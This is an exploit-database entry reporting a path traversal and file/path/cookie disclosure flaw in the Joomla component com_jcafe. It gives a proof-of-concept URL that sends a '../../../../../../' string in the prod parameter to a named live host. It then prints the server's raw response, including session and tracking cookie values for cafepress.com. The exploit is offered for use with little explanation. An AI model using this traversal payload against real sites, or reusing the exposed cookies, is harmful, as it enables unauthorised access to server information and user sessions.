Joomla Component com_jcafe local File/Path / Cookie Disclosure

2010-06-26T00:00:00
ID 1337DAY-ID-12944
Type zdt
Reporter r45c4l
Modified 2010-06-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================================
Joomla Component com_jcafe local File/Path / Cookie Disclosure
==============================================================


There is a vulnerability in the Joomla com_jcafe which will show the File name, Path and Cookies.

p0c :  http://ver1.5.joomcafe.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../

O/P : HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 66356 Date: Fri, 25 Jun 2010 20:19:02 GMT Connection: close Set-Cookie: ASP.NET_SessionId=4kbyayajnq0p3hm33mbrtliu; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=c32f7324-b061-435b-9171-3d05e7f3b1dd; domain=cafepress.com; expires=Wed, 25-Jun-2110 20:19:02 GMT; path=/ Set-Cookie: cpv=dc9398ed-9d75-44a8-b3c9-bd82a820ecbc; domain=cafepress.com; expires=Wed, 25-Jun-2110 20:19:02 GMT; path=/ Set-Cookie: tfx_ltch=6%2cDIRECT%2c20100625131902%2c; domain=cafepress.com; expires=Sat, 26-Jun-2010 20:19:02 GMT; path=/ Set-Cookie: tfx_touch=6%2cDIRECT%2c20100625131902%2c; domain=cafepress.com; expires=Thu, 20-Jun-2030 20:19:02 GMT; path=/ Set-Cookie: cppid=8130179; domain=cafepress.com; expires=Fri, 02-Jul-2010 20:19:02 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Fri, 02-Jul-2010 20:19:02 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Fri, 02-Jul-2010 20:19:02 GMT; path=/ Set-Cookie: pid.guid=e231dd8e-45f5-4135-b623-88566dd5521e; domain=cafepress.com; expires=Mon, 22-Jun-2020 20:19:02 GMT; path=/ Set-Cookie: cp-v=3BB71A8B111CDC9BDEBC023FE4414B97; domain=cafepress.com; expires=Thu, 25-Jun-2020 20:19:02 GMT; path=/ Set-Cookie: cppss=1x2; domain=cafepress.com; path=/ Cache-Control: private




#  0day.today [2018-02-09]  #